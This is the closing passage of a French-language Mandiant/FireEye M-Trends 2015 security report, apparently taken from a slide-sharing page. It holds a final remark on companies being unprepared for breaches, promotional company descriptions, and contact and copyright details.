beaucoup trop d’entreprises n’étaient pas préparées à des compromissions pourtant inévitables, laissant ainsi les attaquants agir trop long- temps en toute quiétude dans les environnements compromis.
  26. 26. 24 www.mandiant.com Les nouvelles du frontM-Trends À propos de Mandiant Mandiant, une entreprise FireEye, compte à son actif d’innombrables missions de réponse à incident et d’élimination des groupes d’attaques avancés pour des centaines de clients dans tous les grands secteurs d’activité. Nous sommes l’interlocuteur privilégié des grands groupes et administrations qui veulent se protéger et réagir à des incidents de sécurité critiques de toutes natures. En cas d’intrusion avérée, les services de conseil en sécurité de Mandiant interviennent à vos côtés pour riposter et reprendre le contrôle de vos réseaux, avec l’appui de la cyberveille et des technologies FireEye. À propos de FireEye FireEye intervient dans le monde entier pour protéger les ressources critiques contre tout acte malveillant. Ensemble, nos technologies, notre cyberveille, notre expertise et notre équipe d’interven- tion rapide vous aident à éliminer l’impact des attaques informatiques. Nous débusquons et neutrali- sons les attaquants à chaque étape d’une intrusion. Avec FireEye, vous détectez les attaques en temps réel. Vous évaluez le risque qu’elles posent pour vos ressources stratégiques. Et vous disposez des moyens de réponse et de résolution des incidents de sécurité. La FireEye Global Defense Community comprend plus de 2 700 clients dans 67 pays, dont 157 entreprises du Fortune 500.
  27. 27. Mandiant, une entreprise FireEye  |  (+1) 703.683.3141  |  (+1) 800.647.7020 |  info@mandiant.com  |  www.mandiant.com | www.fireeye.com © 2015 FireEye, Inc. Tous droits réservés. Mandiant et le logo M sont des marques déposées de FireEye, Inc. Toutes les autres marques, produits ou noms de service sont, ou peuvent être, des marques commerciales ou de service de leurs détenteurs respectifs. RPT.MTRENDS.FR-FR.022415 A FireEye® Company

×